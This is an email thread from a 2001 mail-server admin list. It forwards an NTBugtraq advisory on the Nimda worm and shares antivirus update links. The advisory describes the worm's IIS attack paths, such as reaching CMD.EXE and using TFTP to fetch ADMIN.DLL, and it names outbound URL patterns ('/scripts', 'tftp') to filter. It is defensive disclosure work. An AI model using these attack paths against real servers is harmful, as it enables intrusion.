Thanks! Got it!
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Jerry Murdock
> Sent: Tuesday, September 18, 2001 3:02 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: Re: [imail] OT: Alert: New IIS Worm
>
>
> Try these direct links:
>
> ftp://ftp.hi.is/pub/mirrors/complex.is/pub/fp-def.zip
> http://www4.complex.is/files/fp-def.zip
>
> Jerry
>
>
> ----- Original Message -----
> From: "Fox, Thomas" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 2:52 PM
> Subject: RE: [imail] OT: Alert: New IIS Worm
>
>
> > If anyone has downloaded this, could they forward it
> > to me? We can't get to F-Prot's site
> >
> >
> > > -----Original Message-----
> > > From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED]]On Behalf Of
> > > Jerry Murdock
> > > Sent: Tuesday, September 18, 2001 1:56 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: Re: [imail] OT: Alert: New IIS Worm
> > >
> > >
> > > FYI:
> > >
> > > F-Prot users. The update for this was just released. Get
> > > the new fp-def.zip.
> > >
> > > Jerry
> > >
> > > ----- Original Message -----
> > > From: "Terrence Koeman" <[EMAIL PROTECTED]>
> > > To: <[EMAIL PROTECTED]>
> > > Sent: Tuesday, September 18, 2001 12:42 PM
> > > Subject: [imail] OT: Alert: New IIS Worm
> > >
> > >
> > > > Offtopic
> > > >
> > > > >From NTBUGTRAQ:
> > > >
> > > > ------------------------
> > > > There have been numerous reports of IIS attacks being
> generated by
> > > > machines over a broad range of IP addresses. These "infected"
> > > > machines are using a wide variety of attacks which attempt
> > > to exploit
> > > > already known and patched vulnerabilities against IIS.
> > > >
> > > > It appears that the attacks can come both from email
> and from the
> > > > network.
> > > >
> > > > A new worm, being called w32.nimda.amm, is being sent
> around. The
> > > > attachment is called README.EXE and comes as a MIME-type of
> > > > "audio/x-wav" together with some html parts. There
> appears to be no
> > > > text in this message when it is displayed by Outlook when in
> > > > Auto-Preview mode (always a good indication there's
> something not
> > > > quite right with an email.)
> > > >
> > > > The network attacks against IIS boxes are a wide
> variety of attacks.
> > > > Amongst them appear to be several attacks that assume
> the machine is
> > > > compromised by Code Red II (looking for ROOT.EXE in the
> /scripts and
> > > > /msadc directory, as well as an attempt to use the /c
> and /d virtual
> > > > roots to get to CMD.EXE). Further, it attempts to
> exploit numerous
> > > > other known IIS vulnerabilities.
> > > >
> > > > One thing to note is the attempt to execute TFTP.EXE to
> download a
> > > > file called ADMIN.DLL from (presumably) some previously
> compromised
> > > > box.
> > > >
> > > > Anyone who discovers a compromised machine (a machine
> with ADMIN.DLL
> > > > in the /scripts directory), please forward me a copy of
> that .dll
> > > > ASAP.
> > > >
> > > > Also, look for TFTP traffic (UDP69). As a safeguard,
> consider doing
> > > > the following;
> > > >
> > > > edit %systemroot/system32/drivers/etc/services.
> > > >
> > > > change the line;
> > > >
> > > > tftp 69/udp
> > > >
> > > > to;
> > > >
> > > > tftp 0/udp
> > > >
> > > > thereby disabling the TFTP client. W2K has TFTP.EXE protected by
> > > > Windows File Protection so can't be removed.
> > > >
> > > > More information as it arises.
> > > >
> > > > Cheers,
> > > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > > ------------------------
> > > > Ok, whoa horsy, I've got lots of copies of ADMIN.DLL now thanks!
> > > >
> > > > Analysis is still on-going to determine precisely what
> the infecting
> > > > files do (there are potentially two, ADMIN.DLL and README.EXE).
> > > >
> > > > Some people have said their boxes seem unstable. It
> could be because
> > > > of numerous copies of TFTP.EXE in memory. At this point
> it might be
> > > > best to disconnect any computer that appears unstable from the
> > > > network, until such time as sufficient analysis has been
> > > performed to
> > > > advise how best to bring the box back on-line.
> > > >
> > > > It is also possible for client machines to perform the
> attacks that
> > > > we're seeing, if you have a way to filter outbound HTTP
> requests you
> > > > should look for anything that contains "/scripts" or
> "tftp" in the
> > > > URL and treat as suspicious.
> > > >
> > > > The internal threat by this one is no different (and
> maybe worse)
> > > > than CRII. We've seen indications of WnetEnumResource
> calls as well
> > > > as references to IPC$. There may be NetBIOS share activity
> > > associated
> > > > with the worm, and if so, it will likely spread rapidly
> internally.
> > > >
> > > > More than likely you will see the biggest effect in
> terms of a DoS
> > > > (from many source machines). This thing cares not
> whether you're an
> > > > IIS box or not, it tries regardless. As this spreads
> the effects may
> > > > become more severe (no, I'm not going to provide a quote on how
> > > > severe). Make sure you're inbound (and preferably your outbound)
> > > > router rules are restricted to only those protocols that must be
> > > > present, and ideally to machine IP addresses that should
> > > have access.
> > > >
> > > > More as it becomes available.
> > > >
> > > > Cheers,
> > > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > > ------------------------
> > > > Numerous people have reported that on IIS servers infected with
> > > > w32.nimda.amm, when visitors browse to their website
> the visitor is
> > > > offered up README.EML, which in turn downloads README.EXE to the
> > > > visitor.
> > > >
> > > > Please, check your IIS boxes now to see if you are
> > > infected. I've had
> > > > reports of IIS servers with more than 10,000 .eml files present
> > > > (mostly as a result of nimda).
> > > >
> > > > While we don't have any conclusive disinfecting
> procedures yet, any
> > > > IIS box that has been infected definitely shouldn't be
> available to
> > > > clients until we do.
> > > >
> > > > Cheers,
> > > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > > ------------------------
> > > >
> > > >
> > > > --
> > > > Regards,
> > > >
> > > > Terrence Koeman
> > > >
> > > > Technical Director/Administrator
> > > > MediaMonks B.V. (www.mediamonks.nl)
> > > >
> > > > Please quote all replies in correspondence.
> > >
> > >
> > >
> > >
> > >
> > >
> ______________________________________________________________________
> > > The HKSI-IMail Admin List is hosted by........ Humankind
> Systems, Inc.
> > > Questions, Comments or Complain like Hell..
mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
> >
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
